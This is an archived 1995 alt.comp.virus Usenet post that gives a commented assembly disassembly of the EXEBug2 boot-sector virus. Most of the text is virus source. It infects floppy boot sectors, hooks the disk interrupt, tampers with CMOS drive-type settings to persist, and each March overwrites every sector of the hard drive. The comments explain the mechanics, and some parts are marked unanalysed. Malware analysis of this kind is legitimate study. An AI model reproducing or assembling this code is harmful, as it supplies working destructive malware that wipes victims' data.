home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / ASM-E.ZIP / EXEBUG.ASM < prev    next >
Assembly Source File  |  1995-10-29  |  45KB  |  674 lines

  1. From smtp Tue Feb  7 13:18 EST 1995
  2. Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue,  7 Feb 95 13:18 EST
  3. Received: by lynx.dac.neu.edu (8.6.9/8.6.9) 
  4.      id NAA25457 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:20:39 -0500
  5. Date: Tue, 7 Feb 1995 13:20:39 -0500
  6. From: lynx.dac.neu.edu!ekilby (Eric Kilby)
  7. Content-Length: 44201
  8. Content-Type: binary
  9. Message-Id: <199502071820.NAA25457@lynx.dac.neu.edu>
  10. To: pobox.jwu.edu!joshuaw 
  11. Subject: (fwd) EXEBug
  12. Newsgroups: alt.comp.virus
  13. Status: O
  14.  
  15. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  16. From: danishm@iia.org ()
  17. Newsgroups: alt.comp.virus
  18. Subject: EXEBug
  19. Date: 5 Feb 1995 22:08:52 GMT
  20. Organization: International Internet Association.
  21. Lines: 641
  22. Message-ID: <3h3i9k$v4@ankh.iia.org>
  23. NNTP-Posting-Host: iia.org
  24. X-Newsreader: TIN [version 1.2 PL2]
  25.  
  26. Here is the EXEBug virus:
  27.  
  28. ;-------------------------------------------------------------------------
  29. .286p                                   ; The EXEBUG2 Virus.  This virus
  30. .model tiny                             ; infects diskette boot sectors and
  31. .code                                   ; activates in March of any year,
  32.                                         ; destroying the hard drive.  It
  33.         ORG     0100h                   ; contains instructions for 80286+
  34.                                         ; processors.
  35. ;---------------------------------------;---------------------------------
  36. ; As of Apr 21st, this disassembly is   ; Disassembled with Master Core
  37. ; incomplete, as the test computer uses ;  Disassembler: IQ Software
  38. ; Disk Manager and can not be infected. ; Analyzed with Quaid Analyzer:
  39. ;                                       ;  Quaid Software Ltd.
  40. ;-------------------------------------------------------------------------
  41. ; We are using an origin of 100h, so that this can be assembled with TASM
  42. ; and linked with tlink /t.  You will have a 512 byte .COM file which is
  43. ; a byte-for-byte duplicate of the original boot sector. Note that 100h
  44. ; must be subtracted from many of the offsets.
  45. ;-------------------------------------------------------------------------
  46.                                         ;Offset Opcode  |Comment
  47.                                         ;---------------------------------
  48. Boot_Start:                             ;00100  EB1C
  49.                                         ;---------------------------------
  50.         JMP     Short Change_RAM        ; Boot sectors always begin with
  51.                                         ; a long jump (E9 XX XX) or a short
  52.                                         ; jump (EB XX 90)
  53.                                         ;---------------------------------
  54.         NOP                             ;00102  90      |NOP for short jump
  55. ;---------------------------------------;               |
  56. ; Data in Code Area                     ;               |
  57. ;---------------------------------------;               |
  58. OEM     DB      "MSDOS5.0"              ;00103  4D53444F|OEM name
  59. Byt_Sec DW      0200h                   ;0010B  0002    |Bytes per sector
  60. Sct_AlU DB      02h                     ;0010D  02      |Sectors per
  61.                                         ;               | allocation unit
  62. RsvdSct DW      0001h                   ;0010E  0100    |Reserved sectors
  63. NumFATs DB      02h                     ;00110  02      |Number of FATs
  64. RootSiz DW      0070h                   ;00111  7000    |Number of root dir
  65.                                         ;               | entries (112)
  66. TotSect DW      02D0h                   ;00113  D002    |Total sectors in
  67.                                         ;               | volume (1440)
  68. MedDesc DB      0FDh                    ;00115  FD      |Media descriptor
  69.                                         ;               | byte:
  70.                                         ;---------------------------------
  71.                                         ;  F8 = hard disk
  72.                                         ;  F0 = 3½" 18 sector
  73.                                         ;  F9 = 3½"  9 sector
  74.                                         ;  F9 = 5¼" 15 sector
  75.                                         ;  FC = 5¼" SS 9 sector
  76.                                         ;  FD = 5¼" DS 9 sector
  77.                                         ;  FE = 5¼" SS 8 sector
  78.                                         ;  FF = 5¼: DS 8 sector
  79.                                         ;---------------------------------
  80. FATSect DW      0002h                   ;00116  0200    |Sectors per FAT
  81. Sct_Trk DW      0009h                   ;00118  0900    |Sectors per track
  82. NumHead DW      0002h                   ;0011A  0200    |Number of heads
  83. aDrvNum DW      0000h                   ;0011C  0000    |Drive number (0=A:)
  84. ;---------------------------------------;---------------------------------
  85.                                         ;               |
  86. Change_RAM:                             ;               |
  87.                                         ;               |
  88.         XOR     AX,AX                   ;0011E  33C0    |Zero register
  89.         MOV     DS,AX                   ;00120  8ED8    |DS = 0000
  90.         MOV     DI,AX                   ;00122  8BF8    |DI = 0000
  91.         MOV     SS,AX                   ;00124  8ED0    |SS = 0000
  92.         MOV     SP,7C00h                ;00126  BC007C  |SP = 7C00
  93.                                         ;---------------------------------
  94.                                         ; Get RAM size (usually 64*10 K)
  95.                                         ; and put it in register AX.
  96. Get_RAM_Size:                           ;---------------------------------
  97.                                         ;               |
  98.         MOV     AX,Word Ptr DS:[0413h]  ;00129  A11304  |0000:0413 holds
  99.                                         ;               | RAM size
  100.         MOV     CX,0106h                ;0012C  B90601  |This does two things:
  101.                                         ;               |it sets up a MOVSW,
  102.                                         ;               |and it puts a 6 in
  103.                                         ;               |CL for the SAL,CL
  104.         DEC     AX                      ;0012F  48      |Steal 1K of RAM
  105.                                         ;               | (decrease RAM size)
  106.         MOV     SI,SP                   ;00130  8BF4    |SI is 7C00. Use to
  107.                                         ;               | move boot sector
  108.                                         ;               | in Copy_Boot routine.
  109.                                         ;---------------------------------
  110.                                         ; RAM size is now 1K less; put it
  111.                                         ; in DS:0413h (RAMsize)
  112. Put_RAM_Size:                           ;---------------------------------
  113.                                         ;               |
  114.         MOV     Word Ptr DS:[0413h],AX  ;00132  A31304  |Put the new RAM
  115.                                         ;               | size back in [0413]
  116.         SAL     AX,CL                   ;00135  D3E0    |Convert to paragraphs
  117. ;-------------------------------------------------------------------------
  118. ; AX now holds the SEGMENT of the new Int 13 service routine at TOM - 1K.
  119. ; Next operation exchanges this with the old Int 13 segment stored at 0000:004E.
  120. ;-------------------------------------------------------------------------
  121.                                         ;               |
  122.         MOV     ES,AX                   ;00137  8EC0    |ES = new area SEGMENT
  123.         PUSH    AX                      ;00139  50      |Save SEGMENT address
  124.                                         ;               | on stack. Jump here
  125.                                         ;               | at offset 0152.
  126.         XCHG    AX,DS:[004Eh]           ;0013A  87064E00|Exchange new and old
  127.                                         ;               | SEGMENTS
  128.                                         ;---------------------------------
  129.  
  130.         MOV     Word Ptr DS:[7C00h+offset I13_Seg - 100h],AX
  131.  
  132.                                         ;---------------------------------
  133.                                         ;0013E  A3B87C  |This really should be:
  134.                                         ;               |[7C00h+offset I13_Seg],
  135.                                         ;               |but we use an ORG of
  136.                                         ;               |100h here.
  137.                                         ;      <Store old SEGMENT at 7CB8>
  138.                                         ;---------------------------------
  139.  
  140.         MOV     AX,offset New_Int13_ISR - 100h
  141.  
  142.                                         ;---------------------------------
  143.                                         ;00141  B83201  |Likewise the offset
  144.                                         ;               |of the new Int 13
  145.                                         ;               |service routine is
  146.                                         ;               |decremented by 100h
  147. ;------------------------------------------------------------------------
  148. ; AX now holds the OFFSET of the new Int 13 service routine, which is
  149. ; in our code at offset 232h.  Next operation exchanges this with the
  150. ; the offset stored at 0000:004C.
  151. ;------------------------------------------------------------------------
  152.                                         ;               |
  153.         XCHG    AX,DS:[004Ch]           ;00144  87064C00|Exchange new and old
  154.                                         ;               | OFFSETS
  155.                                         ;---------------------------------
  156.  
  157.         MOV     Word Ptr DS:[7C00h+offset I13_Off - 100h],AX
  158.  
  159.                                         ;---------------------------------
  160.                                         ;00148  A3B67C  |Again, decrement by
  161.                                         ;               | 100h to compensate
  162.                                         ;               | for ORG 100h
  163.                                         ;      <Store old OFFSET at 7CB6>
  164.                                         ;---------------------------------
  165.  
  166.         MOV     AX,[offset Activation - 100h]
  167.  
  168.                                         ;---------------------------------
  169.                                         ;0014B  B89900  |Move offset of
  170.                                         ;               |Activation routine
  171.                                         ;               |to AX.
  172.         PUSH    AX                      ;0014E  50      |Push the Activation
  173.                                         ;               |address, and then
  174.                                         ;               |use that as the
  175.                                         ;               |OFFSET when we RETF
  176.                                         ;               |at offset 0152.
  177. Copy_Boot:                              ;---------------------------------
  178.                                         ;               |
  179.         CLD                             ;0014F  FC      |movsb will increment
  180.                                         ;               |pointers cx=0106h
  181.                                         ;               |ds=0000h sp=7C00h
  182.                                         ;               |si=7C00h di=0000h
  183.                                         ;               |Repeat until Zero
  184.                                         ;               |Flag=0 or CX Times
  185.                                         ;               |
  186.         REP     MOVSW                   ;00150  F3A5    |MOVE DS:SI TO ES:DI
  187.                                         ;---------------------------------
  188.                                         ; Move virus up to the memory we have
  189.                                         ; allocated, and set the INT handler.
  190.                                         ;---------------------------------
  191.                                         ;               |
  192.         RETF                            ;00152  CB      |The segment and
  193.                                         ;               |offset of the
  194.                                         ;               |Activation routine
  195.                                         ;               |were pushed on the
  196.                                         ;               |stack previously, so
  197.                                         ;               |a RETF jumps there
  198.                                         ;               |(at top of memory)
  199.                                         ;>>>>>>>>>>>>>>>|JUMP TO ACTIVATION
  200. ;---------------------------------------;---------------------------------
  201.                                         ;               |
  202.         DB      04h                     ;00153  04      |
  203. Drive   DB      20h                     ;00154  20      |CMOS drive type (AH),
  204.                                         ;               | is stored here.
  205. ChkSum  DW      046Ch                   ;00155  6C04    |CMOS checksum (DX),
  206.                                         ;               | is stored here.
  207. Install DB      01h                     ;00157  01      |This byte is checked
  208.                                         ;               | at offset 294. It is
  209.                                         ;               | used for the value
  210.                                         ;               | of CX when the boot
  211.                                         ;               | record is written
  212.                                         ;               | (starting sector)
  213.                                         ;               | Values are 1 or 11h.
  214. ;-------------------------------------------------------------------------
  215. ; The code (or is it data?) below from offsets 0158 to 0198 is not analyzed,
  216. ; as I could not get an infection on the test computer.
  217. ;-------------------------------------------------------------------------
  218.         SUB     [BX+SI],CH              ;00158  2828    |
  219.         ADD     [BX+DI],AL              ;0015A  0001    |
  220.         ADD     AL,[BP+1Eh]             ;0015C  02461E
  221.                                         ;  ADD AL,[BP+offset Change_RAM-100h]
  222.         PUSH    CX                      ;0015F  51      |
  223.         MOV     DL,65h                  ;00160  B265    |
  224.         MOV     DI,DX                   ;00162  8BFA    |
  225.         DEC     AL                      ;00164  FEC8    |
  226.         STOSW                           ;00166  AB      |STORE Word STRING
  227.                                         ;               | FROM AX
  228.         ADD     DI,+04h                 ;00167  83C704  |
  229.         XOR     AL,0C0h                 ;0016A  34C0    |
  230.         STOSW                           ;0016C  AB      |
  231.         MOV     CL,0Bh                  ;0016D  B10B    |cl=0Bh dl=65h
  232.         REP     STOSB                   ;0016F  F3AA    |STORE 0Bh Bytes
  233.                                         ;               | STRING FROM AL
  234.         MOV     CL,13h                  ;00171  B113    |
  235.         MOV     BH,03h                  ;00173  B703    |
  236.         CALL    $-170h                  ;00175  E88DFE  |This calls offset
  237.                                         ;               |7B05 in this segment.
  238.         MOV     AH,13h                  ;00178  B413    |
  239.         INT     2Fh                     ;0017A  CD2F    |Get & set DOS disk
  240.                                         ;               |int handler
  241.                                         ;               |ds:dx=new handler,
  242.                                         ;               |es:bx=old
  243.         MOV     CS:[01B8h],DS           ;0017C  2E8C1E  |
  244.                                         ;       B801    |
  245.                                         ;               |
  246.         MOV     CX,DX                   ;00181  8BCA    |
  247.         INT     2Fh                     ;00183  CD2F    |Set it again
  248.         MOV     DS:[01B6h],CX           ;00185  890EB601|
  249.         CMP     CL,32h                  ;00189  80F932  |
  250.         JZ      H0000_0198              ;0018C  740A    |Return if CL=32h
  251.         MOV     CX,CS                   ;0018E  8CC9    |
  252.         ADD     CX,+10h                 ;00190  83C110  |
  253.         PUSH    CX                      ;00193  51      |
  254.         MOV     AX,00FDh                ;00194  B8FD00  |
  255.         PUSH    AX                      ;00197  50      |
  256.                                         ;               |
  257. H0000_0198:                             ;---------------------------------
  258.                                         ;               |
  259.         RETF                            ;00198  CB      |
  260. ;---------------------------------------;---------------------------------
  261.                                         ;               |
  262. Activation:                             ;               |
  263.                                         ;               |
  264.         CALL    Main_Routine            ;00199  E86800  |
  265.         MOV     AH,04h                  ;0019C  B404    |AH=4 (get date)
  266.         INT     1Ah                     ;0019E  CD1A    |Get date
  267.                                         ;               |CX=year, DX=mon/day
  268.         CMP     DH,03h                  ;001A0  80FE03  |Is it month #3
  269.         JZ      Damage                  ;001A3  7402    |If it is March,
  270.                                         ;               | do damage
  271.         INT     19h                     ;001A5  CD19    |Otherwise reboot
  272.                                         ;               | with virus resident
  273.                                         ;               | and Int 13 hooked
  274. ;---------------------------------------;---------------------------------
  275.                                         ; Set up Int 13 call from the new
  276. Damage:                                 ;  ISR at I13_Seg:I13_Off.
  277.                                         ;---------------------------------
  278.         MOV     AL,0FFh                 ;001A7  B0FF    |
  279.         OUT     21h,AL                  ;001A9  E621    |Turn off IRQs
  280.         MOV     DX,0080h                ;001AB  BA8000  |DH = head # (0),
  281.                                         ;               |DL = drive #
  282.                                         ;               |  (+80 for hd)
  283.         MOV     CX,0101h                ;001AE  B90101  |CH = cylinder #,
  284.                                         ;               |CL = sector #
  285. Trash_HardDrive:                        ;---------------------------------
  286.                                         ;               |
  287.         MOV     AX,0311h                ;001B1  B81103  |AH = function 03
  288.                                         ;               | (write sectors)
  289.                                         ;               |AL = # of sectors
  290.         PUSHF                           ;001B4  9C      |Push flags: normally
  291.                                         ;               | done prior to
  292.                                         ;               | interrupt.
  293. FarCall DB      9Ah                     ;001B5  9A      |Call the Int 13
  294.                                         ;               | service routine
  295. I13_Off DW      0AB1Bh                  ;001B6  1BAB    |(real) Int 13 offset
  296. I13_Seg DW      0F000h                  ;001B8  00F0    |(real) Int 13 segment
  297.         INC     DH                      ;001BA  FEC6    |Next head
  298.         AND     DH,07h                  ;001BC  80E607  |Test bits 0-3 of DH,
  299.                                         ;               | clear 4-7
  300.         JNZ     Trash_HardDrive         ;001BF  75F0    |If #head > 7
  301.                                         ;               |continue, else trash
  302.         INC     CH                      ;001C1  FEC5    |Next cylinder
  303.         JNZ     Trash_HardDrive         ;001C3  75EC    |If #cylinder > 255
  304.                                         ;               | continue, else keep
  305.                                         ;               | on trashing.
  306.         ADD     CL,40h                  ;001C5  80C140  |Set bits 6 and 7 of
  307.                                         ;               | CL, enabling the
  308.                                         ;               | entire drive to be
  309.                                         ;               | overwritten (or at
  310.                                         ;               |least 1024 cylinders)
  311.         JMP     Short Trash_HardDrive   ;001C8  EBE7    |Only way out of this
  312.                                         ;               | is a disk error, or
  313.                                         ;               | power off.
  314. ;--------------------------------------------------------------------------
  315.                                         ;At this point, it is important to
  316. Change_CMOS:                            ;know what the contents of DX is.
  317.                                         ; CMOS checksums are stored at
  318.                                         ; DS:0053 and DS:0055
  319. ;--------------------------------------------------------------------------
  320.         MOV     AL,10h                  ;001CA  B010    |Diskette type
  321.         CALL    CMOS_Read_Write         ;001CC  E80700  | SET DISKETTE TYPE
  322.         MOV     AL,2Fh                  ;001CF  B02F    |Hi checksum byte
  323.         CALL    CMOS_Read_Write         ;001D1  E80200  | SET CHECKSUM: set
  324.                                         ;               | to zero or restore
  325.         MOV     AL,2Eh                  ;001D4  B02E    |Low checksum byte
  326.                                         ;               | SET CHECKSUM: set
  327.                                         ;               | to zero or restore
  328. CMOS_Read_Write:                        ;---------------------------------
  329.                                         ;               |
  330.         OUT     70h,AL                  ;001D6  E670    |Tell CMOS address
  331.                                         ;               |  to read (in AL)
  332.         XCHG    AH,DL                   ;001D8  86E2    |1st call: AH=DL=00
  333.                                         ;               |2nd call: AH=DL=00
  334.                                         ;               |3rd call: AH=20,DL=00
  335.                                         ;               |4th call: AH=5F,DL=00
  336.                                         ;               |5th call: AH=02,DL=5F
  337.                                         ;               |6th call: AH=00,DL=02
  338.                                         ;               |
  339.         XCHG    DL,DH                   ;001DA  86D6    |1st call: DH=DL=00
  340.                                         ;               |2nd call: DH=00,DL=20
  341.                                         ;               |3rd call: DH=00,DL=7F
  342.                                         ;               |4th call: DH=00,DL=02
  343.                                         ;               |5th call: DH=5F,DL=00
  344.                                         ;               |6th call: DH=02,DL=00
  345.                                         ;               |
  346.         IN      AL,71h                  ;001DC  E471    |Read CMOS to AL
  347.                                         ;               |1st call: AL=20
  348.                                         ;               |2nd call: AL=7F
  349.                                         ;               |3rd call: AL=02
  350.                                         ;               |4th call: AL=00
  351.                                         ;               |5th call: AL=00
  352.                                         ;               |6th call: AL=00
  353.                                         ;               |
  354.         XCHG    DH,AL                   ;001DE  86F0    |Trade AL <-> DH
  355.                                         ;               |1st call: DH=20,AL=00
  356.                                         ;               |2nd call: DH=7F,AL=00
  357.                                         ;               |3rd call: DH=02,AL=00
  358.                                         ;               |4th call: DH=00,AL=00
  359.                                         ;               |5th call: DH=00,AL=5F
  360.                                         ;               |6th call: DH=00,AL=02
  361.                                         ;               |
  362.         OUT     71h,AL                  ;001E0  E671    |Write contents of
  363.                                         ;               |  AL to CMOS
  364.                                         ;               |1st call: AL=00
  365.                                         ;               |2nd call: AL=00
  366.                                         ;               |3rd call: AL=00
  367.                                         ;               |4th call: AL=00
  368.                                         ;               |5th call: AL=5F
  369.                                         ;               |6th call: AL=02
  370.                                         ;               |
  371.         RET                             ;001E2  C3      |Return to Call_CMOS
  372. ;---------------------------------------;---------------------------------
  373.                                         ;               |
  374. Setup_Int13:                            ;               |
  375.                                         ;               |
  376.         MOV     AX,0301h                ;001E3  B80103  |Function #3: write
  377.                                         ;               |  (1) sector
  378. Real_Int13_2:                           ;---------------------------------
  379.                                         ;               |
  380.         CALL    Restore_CMOS            ;001E6  E80500  |Restore original CMOS
  381.         PUSHF                           ;001E9  9C      |Prepare for interrupt
  382.                                         ;---------------------------------
  383.                                                         ;DO THE INTERRUPT 13
  384.         CALL    DWord Ptr DS:[I13_Off-100h]             ;Subtract 100h from
  385.                                                         ; offset of old Int 13
  386.                                         ;001EA  FF1EB600| vector and then call
  387.                                         ;               | it as a DWord (i.e.
  388.                                         ;               | as Segment:Offset)
  389.                                         ;               | Standard Int 13
  390.                                         ;               | resets and repeats
  391.                                         ;               | 3 times if carry
  392.                                         ;               | flag not clear.
  393. Restore_CMOS:                           ;---------------------------------
  394.                                         ;               |
  395.         CALL    Xchg_Old_New            ;001EE  E80300  |
  396.         CALL    Change_CMOS             ;001F1  E8D6FF  |
  397.                                         ;               |
  398. Xchg_Old_New:                           ;---------------------------------
  399.                                         ;               |
  400.         XCHG    AX,DS:[0053h]           ;001F4  87065300|
  401.         XCHG    DX,DS:[0055h]           ;001F8  87165500|
  402.         RET                             ;001FC  C3      |
  403. ;---------------------------------------;---------------------------------
  404.                                         ;               |
  405. Jump_From_Boot:                         ;               |
  406.                                         ;               |
  407.         CALL    Main_Routine            ;001FD  E80400  |
  408.                                         ; CALL 0204h    |
  409.                                         ;               |
  410.         CALL    Restore_CMOS            ;00200  E8EBFF  |Call 01EEh
  411.         ;-------------------------------;---------------------------------
  412.         ;RETF                           ;               |This must be assembled
  413.                                         ;               |as DB 0CBh, otherwise
  414.         DB      0CBh                    ;00203  CB      |the assembler emits
  415.                                         ;               |CA CB 00.
  416. ;---------------------------------------;---------------------------------
  417.                                         ;               |Diddle CMOS. Read
  418. Main_Routine:                           ;00204          |boot with new Int13.
  419.                                         ;               |
  420. ;-------------------------------------------------------------------------
  421. ;                                                       |
  422. ; (64 Bytes)    FFEEDDCC BBAA9988 77665544 33221100     |This is the original
  423. ;               -------- -------- -------- --------     |CMOS setting.
  424. ; CMOS IS NOW:  00008050 02269303 28000016 00200027     |
  425. ;               00000000 0000310D 80028003 00F00020  <--|diskette drive(s) type
  426. ; Checksum -->  7F021A04 01000009 04000000 00000000     |Bits 7-4: drive 0
  427. ;  is 7F02      00000001 01000000 00000000 80190D80     |Bits 3-0: drive 1
  428. ;                                                       |  0000b = no drive
  429. ;                                                       |  0001b = 360K
  430. ;                                                       |  0010b = 1.2 MB
  431. ;                                                       |  0011b = 720K
  432. ;                                                       |  0100b = 1.44 MB
  433. ;                                                       |so in this case there
  434. ;                                                       |is one 1.2 meg drive
  435. ;                                                       |and no 'B' drive
  436. ;-------------------------------------------------------------------------
  437.                                         ;               |Put address of
  438. CMOS_0:                                 ;               | hidden memory on
  439.         PUSH    CS                      ;00204  0E      | stack and then pop
  440.         POP     DS                      ;00205  1F      | it into DS.
  441.         MOV     ES,CX                   ;00206  8EC1    |Zero ES
  442.         CALL    Change_CMOS             ;00208  E8BFFF  |AX=0099,DX=0000
  443. ;-------------------------------------------------------------------------
  444. ;
  445. ; CMOS CHANGED: 00008050 02269303 28000017 00420002
  446. ;               00000000 0000310D 80028003 00F00000 <-NOTE CHANGE
  447. ; NOTE CHANGE-> 00001A04 01000009 04000000 00000000    No drive
  448. ;  No checksum  00000001 01000000 00000000 80190D80
  449. ;
  450. ;-------------------------------------------------------------------------
  451.                                         ;               |Now the drive type
  452. CMOS_1:                                 ;               | and checksum are 00
  453.         MOV     AL,AH                   ;0020B  8AC4    |AX=2020
  454.         AND     AL,0F0h                 ;0020D  24F0    |AX=2020
  455.         JZ      Calc_ChkSum             ;0020F  7408    |Is zero flag set?
  456.         MOV     DS:[0055h],DX           ;00211  89165500|Store checksum in
  457.                                         ;               | DS:[0055]
  458.         MOV     DS:[0054h],AH           ;00215  88265400|Store drive type
  459.                                         ;               | in DS:[0054]
  460. Calc_ChkSum:                            ;---------------------------------
  461.                                         ;               |
  462.         AND     AH,0Fh                  ;00219  80E40F  |Clears high bits
  463.                                         ;               | AX=0020
  464.         SUB     DL,AL                   ;0021C  2AD0    |DX=025F
  465.         SBB     DH,00h                  ;0021E  80DE00  |DX=025F
  466.         CALL    Change_CMOS             ;00221  E8A6FF  |AX=0020, DX=025F
  467. ;-------------------------------------------------------------------------
  468. ;
  469. ; CMOS CHANGED: 00008050 02269303 28000018 00030041
  470. ;               00000000 0000310D 80028003 00F00000
  471. ; NOTE CHANGE-> 5F021A04 01000009 04000000 00000000
  472. ;               00000001 01000000 00000000 80190D80
  473. ;
  474. ;-------------------------------------------------------------------------
  475.                                         ;               |
  476. CMOS_2:                                 ;               |
  477.         MOV     DL,80h                  ;00224  B280    | DL = 80
  478.                                         ;               |
  479. Read_Boot:                              ;---------------------------------
  480.                                         ;               |
  481.         MOV     CX,0001h                ;00226  B90100  | CX = 0001
  482.         MOV     DH,CH                   ;00229  8AF5    | DH = 00
  483.         POP     AX                      ;0022B  58      | Pop return offset
  484.         PUSHF                           ;0022C  9C      | Push flags
  485.         PUSH    CS                      ;0022D  0E      | Save segment
  486.         PUSH    AX                      ;0022E  50      | Save offset
  487.         MOV     AX,0201h                ;0022F  B80102  | AX = 0201 (read
  488.                                         ;               |      one sector)
  489.                                         ;
  490. New_Int13_ISR:                          ;___ New Int 13 Service Routine ___
  491.                                         ;
  492.         CLD                             ;00232  FC      |Clear direction flag
  493.         PUSH    DS                      ;00233  1E      |
  494.         PUSH    SI                      ;00234  56      |
  495.         PUSH    DI                      ;00235  57      |Save some registers
  496.         PUSH    CX                      ;00236  51      |
  497.         PUSH    AX                      ;00237  50      |
  498.         PUSH    CS                      ;00238  0E      |
  499.         POP     DS                      ;00239  1F      |DS = CS
  500.         CMP     AH,03h                  ;0023A  80FC03  |Is it a function 3
  501.                                         ;               | (write disk) call?
  502.         JNZ     Real_Int13_1            ;0023D  7521    |No, so do real Int 13
  503.         CMP     Byte Ptr ES:[BX],4Dh    ;0023F  26803F4D|Yes, but is ES:[BX]=4D?
  504.         JNZ     Real_Int13_1            ;00243  751B    |No, so do real Int13
  505.         OR      AH,DL                   ;00245  0AE2    |Yes, but which drive?
  506.         CMP     CL,AH                   ;00247  3ACC    |Is drive OK??
  507.         JNZ     Real_Int13_1            ;00249  7515    |No, so do real Int13
  508.         MOV     DI,BX                   ;0024B  8BFB    |Yes, buffer is [4D]
  509.         MOV     SI,00A7h                ;0024D  BEA700  |
  510.         MOV     CX,01FEh                ;00250  B9FE01  |Going to move 1FE words
  511.         AND     DL,DL                   ;00253  22D2    |Is it drive #0 (A:)?
  512.         JNZ     H0000_025E              ;00255  7507    |No, so move 'em
  513.         MOV     SI,0002h                ;00257  BE0200  |Yes, SI = 0002
  514.         MOV     AX,5CEBh                ;0025A  B8EB5C  |Move value in AX
  515.         STOSW                           ;0025D  AB      | to ES:[4D]
  516.                                         ;               |
  517. H0000_025E:                             ;---------------------------------
  518.                                         ;               |cx=01FEh,ds=0000h
  519.                                         ;               |si=0002h Move 1FE
  520.         REP     MOVSB                   ;               | words from DS:SI
  521.                                         ;0025E  F3A4    | to ES:DI
  522. Real_Int13_1:                           ;---------------------------------
  523.                                         ;               |
  524.         POP     AX                      ;00260  58      |Restore registers
  525.         POP     CX                      ;00261  59      |
  526.         POP     DI                      ;00262  5F      |
  527.         MOV     SI,AX                   ;00263  8BF0    |SI=function,subfn
  528.         CALL    Real_Int13_2            ;00265  E87EFF  |When done go to
  529.                                         ;               | Return_here.
  530. Return_Here:                            ;---------------------------------
  531.                                         ;               |
  532.         JB      Int13_Error             ;00268  721D    |If Int 13 returned
  533.                                         ;               | error go to err rtn
  534.         PUSH    DI                      ;0026A  57      |Save registers
  535.         PUSH    AX                      ;0026B  50      |
  536.         OR      DH,DH                   ;0026C  0AF6    |Was drive A: target?
  537.         JNZ     Exit_Virus              ;0026E  7514    |Yes, Exit_Virus
  538.         CMP     CX,+01h                 ;00270  83F901  |Was it a 1 sector
  539.                                         ;               | operation?
  540.         JNZ     Exit_Virus              ;00273  750F    |No, Exit_Virus
  541.         MOV     AX,SI                   ;00275  8BC6    |Restore Int 13
  542.                                         ;               | function, sub fn
  543.         CMP     AH,02h                  ;00277  80FC02  |Was it a read fn?
  544.         JZ      Int13_Read              ;0027A  7410    |
  545.         CMP     AH,03h                  ;0027C  80FC03  |
  546.         JNZ     Exit_Virus              ;0027F  7503    |
  547.                                         ;               |
  548. Read_New_Boot:                          ;---------------------------------
  549.                                         ;               |This pushes the
  550.         CALL    Read_Boot               ;00281  E8A2FF  | address of
  551.                                         ;               | Read_Boot on stack
  552. Exit_Virus:                             ;---------------------------------
  553.                                         ;               |
  554.         CLC                             ;00284  F8      |
  555.         POP     AX                      ;00285  58      |Restore registers
  556.         POP     DI                      ;00286  5F      |
  557.                                         ;               |
  558. Int13_Error:                            ;---------------------------------
  559.                                         ;               |
  560.         POP     SI                      ;00287  5E      |
  561.         POP     DS                      ;00288  1F      |
  562.         RETF    0002h                   ;00289  CA0200  |Return to address
  563.                                         ;               | on stack. Discard
  564.                                         ;               | next two bytes on
  565.                                         ;               | stack. This
  566.                                         ;               | eventually gets us
  567.                                         ;               | to offset 19C (check
  568.                                         ;               | activation & reboot)
  569. ;---------------------------------------;---------------------------------
  570. Int13_Read:                             ;               |
  571.                                         ;               |
  572.         PUSH    CX                      ;0028C  51      |Push # sectors
  573.         CMP     Byte Ptr ES:[BX+28h],7Ch;0028D  26807F  |Compare [0000:7C28]
  574.                                         ;       287C    | with 7C. (Boot
  575.                                         ;               | record offset 28).
  576.         JNZ     Boot_Changed            ;00292  750D    |If no, then the
  577.                                         ;               | boot record changed.
  578.                                         ;00294  268B8F  |MOV CX,ES:[BX+0057h]
  579.                                         ;       5700    |
  580.                                                         ;
  581.         MOV     CX,ES:[BX + word ptr Install - 100h]    ;Move starting sector
  582.                                                         ; to CX
  583.         MOV     AL,01h                  ;00299  B001    |
  584.         CALL    Real_Int13_2            ;0029B  E848FF  |
  585.                                         ;               |
  586. HD_Exit:                                ;---------------------------------
  587.                                         ;               |
  588.         POP     CX                      ;0029E  59      |
  589.         JMP     Short Exit_Virus        ;0029F  EBE3    |
  590. ;---------------------------------------;---------------------------------
  591. Boot_Changed:                           ;               |
  592.                                         ;               |
  593.         PUSH    DX                      ;002A1  52      |Save drive info
  594.         MOV     CL,11h                  ;002A2  B111    |CX=0011 (Changed)
  595.         TEST    DL,80h                  ;002A4  F6C280  |Is it a hard drive?
  596.         JNZ     Hard_Drive              ;002A7  7534    |Yes, goto Hard_Drive
  597.         MOV     CH,28h                  ;002A9  B528    |
  598.         CMP    Byte Ptr ES:[BX+15h],0FCh;002AB  26807F  |
  599.                                         ;       15FC    |
  600.         JNB     H0000_02B4              ;002B0  7302    |
  601.         SAL     CH,1                    ;002B2  D0E5    |
  602.                                         ;               |
  603. H0000_02B4:                             ;---------------------------------
  604.                                         ;               | This code not
  605.         PUSH    ES                      ;002B4  06      | analyzed as of
  606.         PUSH    BX                      ;002B5  53      | April 21st.
  607.         XOR     AX,AX                   ;002B6  33C0    |
  608.         MOV     ES,AX                   ;002B8  8EC0    |
  609.         LES     BX,DWord Ptr ES:[0078h] ;002BA  26C41E  |
  610.                                         ;       7800    |
  611.                                         ;               |Load ES & operand
  612.                                         ;               | from memory
  613.         PUSH    ES                      ;002BF  06      |
  614.         PUSH    BX                      ;002C0  53      |
  615.         INC     AL                      ;002C1  FEC0    |
  616.         MOV     CL,AL                   ;002C3  8AC8    |
  617.         XCHG    CL,ES:[BX+04h]          ;002C5  26864F04|
  618.         MOV     AH,05h                  ;002C9  B405    |
  619.         MOV     BX,0059h                ;002CB  BB5900  |
  620.         MOV     [BX],CH                 ;002CE  882F    |
  621.         PUSH    CS                      ;002D0  0E      |
  622.         POP     ES                      ;002D1  07      |
  623.         CALL    Real_Int13_2            ;002D2  E811FF  |
  624.         POP     BX                      ;002D5  5B      |
  625.         POP     ES                      ;002D6  07      |
  626.         XCHG    CL,ES:[BX+04h]          ;002D7  26864F04|
  627.         POP     BX                      ;002DB  5B      |
  628.         POP     ES                      ;002DC  07      |
  629.                                         ;               |
  630. Hard_Drive:                             ;---------------------------------
  631.                                         ;               |
  632.         CALL    Setup_Int13             ;002DD  E803FF  |Prepare for Write
  633.         POP     DX                      ;002E0  5A      |Get drive info
